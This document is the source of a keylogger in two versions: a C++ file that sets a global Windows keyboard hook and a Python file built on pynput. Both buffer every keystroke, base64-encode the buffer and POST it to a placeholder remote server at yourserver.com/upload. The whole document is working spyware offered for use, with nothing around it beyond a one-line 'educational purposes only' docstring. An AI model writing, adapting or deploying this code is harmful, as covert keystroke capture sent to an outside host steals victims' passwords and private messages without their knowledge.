File: keylog_online.cpp
#include <windows.h>
#include <winhttp.h>
#include <string>
#include <vector>

#pragma comment(lib, "winhttp.lib")

// Settings
const std::string SERVER_URL = "https://yourserver.com/upload";
const int BUFFER_SIZE = 1024;

// Buffer to hold keystrokes
std::vector<char> buffer;

// Base64 encoding function
std::string base64_encode(const unsigned char* input, std::size_t length) {
    // Implementation of Base64 encoding
    static const char* base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string encoded;
    int i = 0, j = 0;
    unsigned char char_array_3[3];
    unsigned char char_array_4[4];

    while (length--) {
        char_array_3[i++] = *(input++);
        if (i == 3) {
            char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
            char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
            char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
            char_array_4[3] = char_array_3[2] & 0x3f;

            for (i = 0; (i < 4); i++)
                encoded += base64_chars[char_array_4[i]];
            i = 0;
        }
    }

    if (i)
    {
        for (j = i; j < 3; j++)
            char_array_3[j] = '\0';

        char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
        char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
        char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);

        for (j = 0; (j < i + 1); j++)
            encoded += base64_chars[char_array_4[j]];

        while ((i++ < 3))
            encoded += '=';
    }

    return encoded;
}

// Function to send keystrokes to the server
auto send_data() {
    // Create WinHTTP request
    HINTERNET hSession = WinHttpOpen(L"Keylogger/1.0", WINHTTP_ACCESS_TYPE_AUTO_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    HINTERNET hConnect = WinHttpConnect(hSession, std::wstring(SERVER_URL.begin(), SERVER_URL.end()).c_str(), INTERNET_DEFAULT_HTTP_PORT, 0);
    HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", NULL, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

    // Send the data
    std::string encoded_data = base64_encode(reinterpret_cast<const unsigned char*>(buffer.data()), buffer.size());
    WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded", -1, (LPVOID)encoded_data.c_str(), encoded_data.length(), encoded_data.length(), 0);
    WinHttpReceiveResponse(hRequest);

    // Clean up
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
}

// Hook keyboard
LRESULT CALLBACK KeyboardHook(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION) {
        KBDLLHOOKSTRUCT* key = (KBDLLHOOKSTRUCT*)lParam;
        buffer.push_back((char)key->vkCode);

        if (buffer.size() >= BUFFER_SIZE) {
            send_data();
            buffer.clear();
        }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

int main() {
    // Set keyboard hook
    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardHook, NULL, 0);
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hook);
    return 0;
}

File: keylog_online.py
"""
keylog_online.py - Keylogger that buffers keystrokes and transmits them to a
remote server via HTTP POST.

For educational purposes only. Ensure compliance with local laws before use.
"""

import base64
import os

import requests
from pynput import keyboard

SERVER_URL = os.getenv("KEYLOG_SERVER_URL", "https://yourserver.com/upload")
BUFFER_SIZE = int(os.getenv("KEYLOG_BUFFER_SIZE", "1024"))

buffer: list[str] = []


def send_data(data: str) -> None:
    """Base64-encode *data* and POST it to SERVER_URL."""
    encoded = base64.b64encode(data.encode()).decode()
    try:
        requests.post(
            SERVER_URL,
            data={"data": encoded},
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            timeout=10,
            verify=True,
        )
    except requests.RequestException:
        pass


def on_press(key: keyboard.Key | keyboard.KeyCode) -> None:
    try:
        char = key.char  # type: ignore[union-attr]
    except AttributeError:
        char = f"[{key.name}]"  # type: ignore[union-attr]

    buffer.append(char)

    if len(buffer) >= BUFFER_SIZE:
        send_data("".join(buffer))
        buffer.clear()


def main() -> None:
    with keyboard.Listener(on_press=on_press) as listener:
        try:
            listener.join()
        except KeyboardInterrupt:
            pass
    if buffer:
        send_data("".join(buffer))
        buffer.clear()


if __name__ == "__main__":
    main()
